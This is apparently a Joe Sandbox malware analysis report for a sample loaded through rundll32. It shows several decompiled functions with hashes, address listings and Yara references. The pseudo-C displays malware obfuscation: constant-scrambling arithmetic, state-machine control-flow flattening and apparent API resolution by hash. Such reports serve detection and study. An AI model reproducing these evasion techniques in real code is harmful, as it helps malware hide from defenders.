Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@
API String ID: 0-3095773534
Opcode ID: 51cefde5c70d45cdf55c97d62918e1bd36a711d482a439a7469d688c79c35cef
Instruction ID: 684c049d7bbdb8b3125b5746f9be8f73c1d5c65238ad6a03882c9689935a9ef1
Opcode Fuzzy Hash: 51cefde5c70d45cdf55c97d62918e1bd36a711d482a439a7469d688c79c35cef
Instruction Fuzzy Hash: 7731D371D00608FBEB08DFA9D98A9DEBFB6EB44314F20C099E115A6291D7B55B94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002A2513, Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E002A2513(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t134;
				signed int _t160;
				intOrPtr* _t162;
				void* _t164;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int* _t192;

				_t189 = _a4;
				_t162 = __ecx;
				_push(_a8);
				_push(_t189);
				_push(__ecx);
				E0029E171(_t134);
				_v60 = 0x27564a;
				_t192 =  &(( &_v104)[4]);
				asm("stosd");
				_t164 = 0x9f4bb1d;
				asm("stosd");
				asm("stosd");
				_a4 = 0x6c90;
				_a4 = _a4 ^ 0x26e4ba50;
				_t184 = 0x6e;
				_a4 = _a4 / _t184;
				_a4 = _a4 + 0xffff6dce;
				_a4 = _a4 ^ 0x0059bfaf;
				_v68 = 0x8d8c;
				_t185 = 0x38;
				_v68 = _v68 * 0x1a;
				_v68 = _v68 ^ 0x000e0796;
				_v80 = 0x3bf9;
				_v80 = _v80 + 0xffffcf83;
				_v80 = _v80 | 0x87b471f2;
				_v80 = _v80 ^ 0x87b446bb;
				_v84 = 0x7b97;
				_v84 = _v84 + 0xffff7cb6;
				_v84 = _v84 + 0xffffe0d8;
				_v84 = _v84 ^ 0xffffe2a4;
				_v100 = 0x118d;
				_v100 = _v100 << 4;
				_v100 = _v100 + 0xffffbb90;
				_v100 = _v100 * 0x5c;
				_v100 = _v100 ^ 0x004c7482;
				_v104 = 0x50b0;
				_v104 = _v104 + 0x51cd;
				_v104 = _v104 >> 5;
				_v104 = _v104 * 0x64;
				_v104 = _v104 ^ 0x0001fcaa;
				_v88 = 0x943a;
				_v88 = _v88 + 0xffff5264;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0xf6f04849;
				_v88 = _v88 ^ 0xf68fc020;
				_v92 = 0xda3d;
				_v92 = _v92 ^ 0xb0b87cdf;
				_v92 = _v92 + 0xffffdf05;
				_v92 = _v92 / _t185;
				_v92 = _v92 ^ 0x0327b260;
				_v96 = 0x22ab;
				_t186 = 0x3e;
				_v96 = _v96 / _t186;
				_v96 = _v96 ^ 0xe0c4f04d;
				_v96 = _v96 ^ 0xf8852d67;
				_v96 = _v96 ^ 0x1841b5f7;
				_v72 = 0xbc45;
				_t187 = 0x56;
				_v72 = _v72 / _t187;
				_v72 = _v72 | 0x9b744b3c;
				_v72 = _v72 ^ 0x9b7402fa;
				_v64 = 0x8dae;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0004471e;
				_v76 = 0x56f8;
				_v76 = _v76 + 0xffff2bfd;
				_v76 = _v76 + 0x4508;
				_v76 = _v76 ^ 0xffff8678;
				do {
					while(_t164 != 0x9f4bb1d) {
						if(_t164 == 0xf085216) {
							E002931A5( *_t162, _v88, _v92,  &_v44, _v96);
							_t192 =  &(_t192[3]);
							_t164 = 0x243edee0;
							continue;
						} else {
							if(_t164 == 0x21821957) {
								E002ACF95(_v100,  &_v44, _t189, _v104);
								_t164 = 0xf085216;
								continue;
							} else {
								if(_t164 == 0x243edee0) {
									E002A5677(_v72, _v64, __eflags, _t162 + 4,  &_v44, _v76);
								} else {
									if(_t164 == 0x2587d65c) {
										_push(_t164);
										_push(_t164);
										_t160 = E002A9E2B(_t189[1]);
										_t192 =  &(_t192[3]);
										 *_t189 = _t160;
										__eflags = _t160;
										if(__eflags != 0) {
											_t164 = 0x21821957;
											continue;
										}
									} else {
										if(_t164 != 0x2688d56c) {
											goto L13;
										} else {
											_t189[1] = E0029DB5B(_t162);
											_t164 = 0x2587d65c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t189;
						_t133 =  *_t189 != 0;
						__eflags = _t133;
						return 0 | _t133;
					}
					 *_t189 = 0;
					_t164 = 0x2688d56c;
					_t189[1] = 0;
					L13:
					__eflags = _t164 - 0x28c45859;
				} while (__eflags != 0);
				goto L16;
			}

0x002a2519
0x002a251d
0x002a2520
0x002a2527
0x002a2529
0x002a252a
0x002a252f
0x002a253d
0x002a2540
0x002a2543
0x002a254a
0x002a254b
0x002a254c
0x002a2557
0x002a2569
0x002a256e
0x002a2577
0x002a2582
0x002a258d
0x002a259a
0x002a259d
0x002a25a1
0x002a25a9
0x002a25b1
0x002a25b9
0x002a25c1
0x002a25c9
0x002a25d1
0x002a25d9
0x002a25e1
0x002a25e9
0x002a25f1
0x002a25f6
0x002a2603
0x002a2607
0x002a260f
0x002a2617
0x002a261f
0x002a2629
0x002a262d
0x002a2635
0x002a263d
0x002a2645
0x002a264a
0x002a2652
0x002a265a
0x002a2662
0x002a266a
0x002a267a
0x002a267e
0x002a2686
0x002a2692
0x002a2695
0x002a2699
0x002a26a1
0x002a26a9
0x002a26b3
0x002a26c1
0x002a26c9
0x002a26cd
0x002a26d5
0x002a26dd
0x002a26e5
0x002a26ea
0x002a26f2
0x002a26fa
0x002a2702
0x002a270a
0x002a2714
0x002a2714
0x002a2726
0x002a27b5
0x002a27ba
0x002a27bd
0x00000000
0x002a2728
0x002a272a
0x002a2791
0x002a2798
0x00000000
0x002a272c
0x002a2732
0x002a27f4
0x002a2738
0x002a273e
0x002a276d
0x002a276e
0x002a2772
0x002a2777
0x002a277a
0x002a277c
0x002a277e
0x002a2780
0x00000000
0x002a2780
0x002a2740
0x002a2746
0x00000000
0x002a274c
0x002a2753
0x002a2756
0x00000000
0x002a2756
0x002a2746
0x002a273e
0x002a2732
0x002a272a
0x002a27fc
0x002a27fe
0x002a2803
0x002a2803
0x002a280a
0x002a280a
0x002a27c7
0x002a27c9
0x002a27ce
0x002a27d1
0x002a27d1
0x002a27d1
0x00000000

Strings

JV', xrefs: 002A252F

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: JV'
API String ID: 0-3416759997
Opcode ID: a3e51b4da63d13696b0d61a4a32c9bfb33fdd40c6278843a10a9a075a32f4d5b
Instruction ID: d9e49d5995eba572174ebbc36128cb7229f3fd83c5899add290523ad49a94498
Opcode Fuzzy Hash: a3e51b4da63d13696b0d61a4a32c9bfb33fdd40c6278843a10a9a075a32f4d5b
Instruction Fuzzy Hash: C6716570118342DBD368CF28C88991BFBE1FFD4358F504A1DF4C6962A0DBB09A598F82

Uniqueness

Uniqueness Score: -1.00%

Function 002A5B60, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002A5B60() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t86;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;

				_v332 = 0x4da377;
				_v328 = 0x2fced2;
				_t86 = 0xc6f1f79;
				_t103 = 0;
				_v324 = 0;
				_v336 = 0x40af;
				_v336 = _v336 + 0xffff1543;
				_v336 = _v336 ^ 0xffff76e6;
				_v348 = 0x8105;
				_t100 = 0x64;
				_v348 = _v348 / _t100;
				_t101 = 3;
				_v348 = _v348 * 0xb;
				_v348 = _v348 ^ 0x00003723;
				_v344 = 0x36a8;
				_v344 = _v344 | 0xeb7bff84;
				_v344 = _v344 / _t101;
				_v344 = _v344 ^ 0x4e7ea87a;
				_v352 = 0x22f1;
				_v352 = _v352 << 0xf;
				_v352 = _v352 * 0x36;
				_v352 = _v352 ^ 0xaf6b7d5d;
				_v340 = 0xefc4;
				_v340 = _v340 * 0x62;
				_v340 = _v340 + 0xfd8e;
				_v340 = _v340 ^ 0x005ccf04;
				_v356 = 0xc16;
				_v356 = _v356 >> 4;
				_v356 = _v356 ^ 0xee97cc61;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0xdd2f873d;
				do {
					while(_t86 != 0xc6f1f79) {
						if(_t86 == 0x16b1523b) {
							_v284 = 0x11c;
							E00292FD8(_v336, _v348,  &_v284, _v344);
							_t86 = 0x30fa3360;
							continue;
						} else {
							if(_t86 == 0x1922504a) {
								_t103 = _t103 + (_v320 & 0x0000ffff);
							} else {
								if(_t86 == 0x30fa3360) {
									E002A1E15( &_v320, _v340, _v356);
									_t86 = 0x319352e1;
									continue;
								} else {
									if(_t86 == 0x319352e1) {
										_t86 = 0x39779ed1;
										_t103 = _t103 + (_v2 & 0x000000ff) * 0x186a0;
										continue;
									} else {
										if(_t86 == 0x33dba970) {
											_t86 = 0x1922504a;
											_t103 = _t103 + _v276 * 0x64;
											continue;
										} else {
											if(_t86 != 0x39779ed1) {
												goto L14;
											} else {
												_t86 = 0x33dba970;
												_t103 = _t103 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t103;
					}
					_t86 = 0x16b1523b;
					L14:
				} while (_t86 != 0xbeb5534);
				goto L17;
			}

0x002a5b66
0x002a5b70
0x002a5b78
0x002a5b80
0x002a5b87
0x002a5b90
0x002a5b98
0x002a5ba0
0x002a5ba8
0x002a5bb7
0x002a5bbc
0x002a5bc7
0x002a5bc8
0x002a5bcc
0x002a5bd4
0x002a5bdc
0x002a5bef
0x002a5bf3
0x002a5bfb
0x002a5c03
0x002a5c15
0x002a5c19
0x002a5c21
0x002a5c2e
0x002a5c32
0x002a5c3a
0x002a5c42
0x002a5c4a
0x002a5c4f
0x002a5c57
0x002a5c5b
0x002a5c63
0x002a5c63
0x002a5c71
0x002a5cf9
0x002a5d01
0x002a5d08
0x00000000
0x002a5c73
0x002a5c75
0x002a5d27
0x002a5c7b
0x002a5c81
0x002a5cd7
0x002a5cde
0x00000000
0x002a5c83
0x002a5c89
0x002a5cb8
0x002a5cc3
0x00000000
0x002a5c8b
0x002a5c8d
0x002a5caa
0x002a5cac
0x00000000
0x002a5c8f
0x002a5c95
0x00000000
0x002a5c97
0x002a5c9f
0x002a5ca1
0x00000000
0x002a5ca1
0x002a5c95
0x002a5c8d
0x002a5c89
0x002a5c81
0x002a5c75
0x002a5d2a
0x002a5d35
0x002a5d35
0x002a5d12
0x002a5d14
0x002a5d14
0x00000000

Strings

#7, xrefs: 002A5BCC

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7
API String ID: 0-1204666513
Opcode ID: 5b72a70d6b7ae402061760a71ea162cc73a4b299acbd532641d1a1abe9a2a79c
Instruction ID: 4248f9a087eb4036e032d90a82b33af6f0869ddef4a133d23482a7b2670c731e
Opcode Fuzzy Hash: 5b72a70d6b7ae402061760a71ea162cc73a4b299acbd532641d1a1abe9a2a79c
Instruction Fuzzy Hash: 9041677150C7528BD718CF24D49542BFBE6BBC5754F148A2EF49296290CBB8CA1A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 002A72AE, Relevance: 1.4, Strings: 1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E002A72AE(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _t114;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t149;
				signed int _t150;
				void* _t154;

				_t154 = __eflags;
				_push(_a8);
				_t149 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t114);
				_v52 = _v52 & 0x00000000;
				_v64 = 0x3d1bc8;
				_v60 = 0x288dc5;
				_v56 = 0x405ded;
				_v20 = 0xe9c8;
				_v20 = _v20 + 0xffff3e23;
				_t136 = 0x45;
				_v20 = _v20 / _t136;
				_v20 = _v20 ^ 0x00000757;
				_v28 = 0xf93a;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005820;
				_v24 = 0xacb5;
				_v24 = _v24 + 0x8cc5;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x00003187;
				_v36 = 0xb78d;
				_v36 = _v36 ^ 0x3da15357;
				_v36 = _v36 ^ 0x3da1b5a1;
				_v8 = 0xf47;
				_v8 = _v8 + 0xffffc5ed;
				_v8 = _v8 << 1;
				_v8 = _v8 + 0xffffad9f;
				_v8 = _v8 ^ 0xffff0024;
				_v32 = 0xad63;
				_v32 = _v32 | 0x745b6cf3;
				_v32 = _v32 ^ 0x745bf39a;
				_v44 = 0xa383;
				_v44 = _v44 + 0xfffffb73;
				_v44 = _v44 ^ 0x0000f2fb;
				_v16 = 0x1b40;
				_t137 = 0x2a;
				_v16 = _v16 / _t137;
				_v16 = _v16 ^ 0x2015cc97;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x81b39c03;
				_v40 = 0x55b3;
				_v40 = _v40 + 0x83ab;
				_v40 = _v40 ^ 0x0000a5c2;
				_v12 = 0x1001;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xc0f47d5b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x303d7baf;
				_v48 = E002A1214();
				_v20 = 0xa41;
				_t138 = 0x57;
				_v20 = _v20 * 0x48;
				_v20 = _v20 / _t138;
				_v20 = _v20 ^ 0x00000878;
				_v28 = 0x3a0c;
				_v28 = _v28 + 0xffffd15a;
				_v28 = _v28 ^ 0x00000b76;
				_t150 = E002A8E0A(_v28, _v20 % _t138, _t154, _v20);
				E002911B2(_t150, 1, _v16, _t149, _v40, _v12,  &_v48);
				 *((short*)(_t149 + _t150 * 2)) = 0;
				return 0;
			}

0x002a72ae
0x002a72b6
0x002a72b9
0x002a72bb
0x002a72be
0x002a72bf
0x002a72c0
0x002a72c5
0x002a72cb
0x002a72d2
0x002a72d9
0x002a72e0
0x002a72e7
0x002a72f3
0x002a72f8
0x002a72fd
0x002a7304
0x002a730b
0x002a730f
0x002a7316
0x002a731d
0x002a7324
0x002a7328
0x002a732f
0x002a7336
0x002a733d
0x002a7344
0x002a734b
0x002a7352
0x002a7355
0x002a735c
0x002a7363
0x002a736a
0x002a7371
0x002a7378
0x002a737f
0x002a7386
0x002a738d
0x002a7397
0x002a739a
0x002a739d
0x002a73a8
0x002a73ab
0x002a73b2
0x002a73b9
0x002a73c0
0x002a73c7
0x002a73ce
0x002a73d2
0x002a73d9
0x002a73dd
0x002a73ef
0x002a73f4
0x002a7401
0x002a7402
0x002a740a
0x002a740d
0x002a7414
0x002a741b
0x002a7422
0x002a7443
0x002a745a
0x002a7464
0x002a746d

Strings

]@, xrefs: 002A72D9

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]@
API String ID: 0-2650338837
Opcode ID: cd0307e8628e6e73b102de55c00cf7e1281dae4e58e347f97b3ce5b84d7adb54
Instruction ID: 8c9f3898094b2f9580ad31f7a4f0f5fd57ed7545cd62d36c46dd0707fdbe15b4
Opcode Fuzzy Hash: cd0307e8628e6e73b102de55c00cf7e1281dae4e58e347f97b3ce5b84d7adb54
Instruction Fuzzy Hash: 12510FB1D0030AEBDF08DFA5C94A9EEBBB1FF44314F208159E415B62A0D7B95A54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002A3600, Relevance: 1.3, Strings: 1, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E002A3600(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v4;
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t65;
				void* _t81;
				signed int _t83;
				signed int _t84;
				void* _t94;
				void* _t95;
				void* _t96;

				_push(_a24);
				_t81 = __edx;
				_t96 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t65);
				_v8 = 0xd583;
				_v8 = _v8 >> 2;
				_t95 = 0;
				_v8 = _v8 ^ 0x00002a9d;
				_v12 = 0x4196;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0x78f8;
				_v12 = _v12 ^ 0x00007525;
				_v24 = 0xcbcf;
				_v24 = _v24 + 0x160f;
				_v24 = _v24 ^ 0xf9f05095;
				_t83 = 0x7a;
				_v24 = _v24 / _t83;
				_v24 = _v24 ^ 0x020c3e73;
				_v16 = 0xa2b9;
				_t84 = 0x61;
				_v16 = _v16 * 0x19;
				_v16 = _v16 / _t84;
				_v16 = _v16 ^ 0x00007892;
				_v4 = 0xc1c2;
				_v4 = _v4 << 0xb;
				_v4 = _v4 ^ 0x060e67f1;
				_v20 = 0xaf46;
				_v20 = _v20 * 0x60;
				_v20 = _v20 + 0x135d;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x0000b094;
				_t94 = E002A9E2B(0x40000);
				if(_t94 != 0) {
					_push(_t94);
					_push(_t81);
					_push(_a12);
					_t95 = E002923DD(_t96, _a24);
					E0029EF80(_v4, _t94, _v20);
				}
				return _t95;
			}

0x002a3607
0x002a360b
0x002a360d
0x002a360f
0x002a3613
0x002a3617
0x002a361b
0x002a361f
0x002a3623
0x002a3624
0x002a3625
0x002a362a
0x002a3634
0x002a3639
0x002a363b
0x002a3643
0x002a364b
0x002a3650
0x002a3658
0x002a3660
0x002a3668
0x002a3670
0x002a367e
0x002a3683
0x002a3689
0x002a3691
0x002a369e
0x002a36a2
0x002a36b1
0x002a36b5
0x002a36bd
0x002a36c5
0x002a36ca
0x002a36d2
0x002a36df
0x002a36e3
0x002a36eb
0x002a36f0
0x002a370d
0x002a3714
0x002a371c
0x002a371d
0x002a371e
0x002a3731
0x002a3733
0x002a3738
0x002a3744

Strings

%u, xrefs: 002A3658

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %u
API String ID: 0-2303018923
Opcode ID: 70cb284be56c6f74866311150f6388aa43c07d0035f047a7be0f075312af5509
Instruction ID: aa5c43c0102caf278c08512bca2e426daaa2c4f429bac8e6546e6d45035c713c
Opcode Fuzzy Hash: 70cb284be56c6f74866311150f6388aa43c07d0035f047a7be0f075312af5509
Instruction Fuzzy Hash: 7C314971608340AFE384DF25C88A80BFBF2FBC5708F445A5DF98496261D7BAD9148F42

Uniqueness

Uniqueness Score: -1.00%

Function 002967AC, Relevance: 1.3, Strings: 1, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E002967AC(void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t57;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t72;
				void* _t79;

				_t79 = __ecx;
				E0029E171(_t57);
				_v32 = 0x2d28e9;
				_v28 = 0x1aa92f;
				_v24 = 0;
				_v12 = 0xe90b;
				_t71 = 0xd;
				_v12 = _v12 / _t71;
				_t72 = 0x15;
				_v12 = _v12 * 0x29;
				_v12 = _v12 / _t72;
				_v12 = _v12 ^ 0x00005337;
				_v8 = 0xa1b3;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00000bbf;
				_v20 = 0x971d;
				_v20 = _v20 | 0x85bb821b;
				_v20 = _v20 ^ 0x85bbc9b2;
				_v16 = 0xe3b0;
				_v16 = _v16 ^ 0x6ea3c339;
				_v16 = _v16 + 0x10e3;
				_v16 = _v16 ^ 0x6ea33e58;
				_t68 = E0029606F(0x1d0, 0xbee648b, _t72, _t72, 0xb8db165d);
				return  *_t68(_a12, _a16, _t79, 0, 0, _a20, __ecx, 0, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
			}

0x002967b9
0x002967d3
0x002967d8
0x002967e1
0x002967e8
0x002967eb
0x002967f7
0x002967fc
0x00296805
0x00296809
0x00296816
0x0029681e
0x00296825
0x0029682c
0x00296830
0x00296834
0x00296838
0x0029683f
0x00296846
0x0029684d
0x00296854
0x0029685b
0x00296862
0x00296869
0x00296883
0x0029689e

Strings

(-, xrefs: 002967D8

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (-
API String ID: 0-4239615555
Opcode ID: 7729c96a3b587b5dbb72da7a06bd9adb513d28e8fdf3ada121995938d3e2ee7d
Instruction ID: 2eb2b96ea0d3ed6fbbaa1769c37bc2ea9d9360307d5fa55139f57513b83ad64d
Opcode Fuzzy Hash: 7729c96a3b587b5dbb72da7a06bd9adb513d28e8fdf3ada121995938d3e2ee7d
Instruction Fuzzy Hash: DE31227290020CEFDF05DF95C84A8DEBFB5FF98304F10808AE514A6250D3B59A659FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0029DB5B, Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0029DB5B(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t52;
				signed int _t55;
				signed int _t56;
				void* _t58;
				intOrPtr _t66;
				void* _t67;
				signed int* _t69;

				_t58 = __ecx;
				_t69 =  &_v28;
				_v12 = 0x287631;
				_t66 = 0;
				_v8 = 0;
				_t67 = 0x156eb747;
				_v4 = 0;
				_v20 = 0xcbe6;
				_v20 = _v20 + 0xffffd67b;
				_t55 = 0x49;
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00007983;
				_v28 = 0xea19;
				_v28 = _v28 >> 5;
				_v28 = _v28 >> 3;
				_t56 = 0x66;
				_v28 = _v28 / _t56;
				_v28 = _v28 ^ 0x000007fe;
				_v16 = 0x167e;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000110e;
				_v24 = 0xfdc1;
				_v24 = _v24 ^ 0xf0acdba6;
				_v24 = _v24 + 0x4c0;
				_v24 = _v24 ^ 0xcbee03a8;
				_v24 = _v24 ^ 0x3b426675;
				do {
					while(_t67 != 0x736bc83) {
						if(_t67 == 0x156eb747) {
							_t67 = 0x736bc83;
							continue;
						} else {
							if(_t67 != 0x2a81ed09) {
								goto L8;
							} else {
								_t66 = _t66 + E002AA774(_t58 + 4, _v16, _v24);
							}
						}
						L5:
						return _t66;
					}
					_push(_t58);
					_t52 = E002962BA();
					_t69 =  &(_t69[1]);
					_t67 = 0x2a81ed09;
					_t66 = _t66 + _t52;
					L8:
				} while (_t67 != 0x34dad2c1);
				goto L5;
			}

0x0029db5b
0x0029db5b
0x0029db5f
0x0029db6c
0x0029db73
0x0029db77
0x0029db79
0x0029db7d
0x0029db85
0x0029db93
0x0029db98
0x0029db9c
0x0029dba4
0x0029dbac
0x0029dbb1
0x0029dbbc
0x0029dbc9
0x0029dbcd
0x0029dbd5
0x0029dbdd
0x0029dbe2
0x0029dbea
0x0029dbf2
0x0029dbfa
0x0029dc02
0x0029dc0a
0x0029dc12
0x0029dc12
0x0029dc18
0x0029dc3d
0x00000000
0x0029dc1a
0x0029dc1c
0x00000000
0x0029dc1e
0x0029dc31
0x0029dc31
0x0029dc1c
0x0029dc33
0x0029dc3c
0x0029dc3c
0x0029dc49
0x0029dc4a
0x0029dc4f
0x0029dc52
0x0029dc54
0x0029dc56
0x0029dc56
0x00000000

Strings

ufB;, xrefs: 0029DC0A

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ufB;
API String ID: 0-1119616131
Opcode ID: 2373a7a986811a1f8a6391b5bdcf9823f87368fb37048cd9cb78713203ab0d24
Instruction ID: 000c0e562c98a9efe229a82bee16c22b676c57714fd237981cf20a546516c11f
Opcode Fuzzy Hash: 2373a7a986811a1f8a6391b5bdcf9823f87368fb37048cd9cb78713203ab0d24
Instruction Fuzzy Hash: 172188B29093028BD324DF29D88550BFAE1FBE4718F15491EF59496211D3B5CA1CDBD3

Uniqueness

Uniqueness Score: -1.00%

Function 0029DEC9, Relevance: 1.3, Strings: 1, Instructions: 51
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0029DEC9(intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t67;
				signed int _t68;

				_v20 = 0x3eba;
				_v20 = _v20 << 0xb;
				_v20 = _v20 >> 2;
				_v20 = _v20 << 8;
				_v20 = _v20 ^ 0x7d7400b7;
				_v16 = 0x5189;
				_v16 = _v16 + 0xf858;
				_t67 = 0x2d;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x165c1a53;
				_v16 = _v16 ^ 0x165c41f1;
				_v12 = 0xd806;
				_t68 = 0x72;
				_v12 = _v12 / _t68;
				_v12 = _v12 ^ 0xba49b1de;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x926c7d2d;
				_v8 = 0x2dd8;
				_v8 = _v8 ^ 0x1db834f3;
				_v8 = _v8 ^ 0x117acc45;
				_v8 = _v8 + 0x4c59;
				_v8 = _v8 ^ 0x0cc35c55;
				_push(__edx);
				return E0029606F(_a4, 0xebe0dc83, __edx, __edx, __edx);
			}

0x0029decf
0x0029ded8
0x0029dede
0x0029dee2
0x0029dee6
0x0029deed
0x0029def4
0x0029df01
0x0029df06
0x0029df0b
0x0029df12
0x0029df19
0x0029df23
0x0029df29
0x0029df2c
0x0029df33
0x0029df37
0x0029df3e
0x0029df45
0x0029df4c
0x0029df53
0x0029df5a
0x0029df6d
0x0029df82

Strings

YL, xrefs: 0029DF53

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: YL
API String ID: 0-1439365465
Opcode ID: 0e174df29487d7f52eab52fca4ace0a89fea93112780177c30c4e18b28eef758
Instruction ID: a041c4316d97b63431e196be2f6906fde08e83d588b99f62cdd2d89193a002f4
Opcode Fuzzy Hash: 0e174df29487d7f52eab52fca4ace0a89fea93112780177c30c4e18b28eef758
